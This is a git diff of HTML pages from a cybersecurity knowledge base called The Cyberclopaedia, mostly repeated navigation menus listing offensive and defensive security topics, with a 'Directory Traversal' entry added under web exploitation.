    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -220,22 +220,6 @@

Default Groups< - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Terminology.html b/docs/System Internals/Windows/Active Directory (AD)/Terminology.html index 26b94a88..298b307b 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Terminology.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Terminology.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

The Cyberclopaedia

- - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Users.html b/docs/System Internals/Windows/Active Directory (AD)/Users.html index a08a6004..1e239334 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Users.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Users.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

Domain Users - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/index.html b/docs/System Internals/Windows/Active Directory (AD)/index.html index 4770a417..b9c5a080 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/index.html +++ b/docs/System Internals/Windows/Active Directory (AD)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
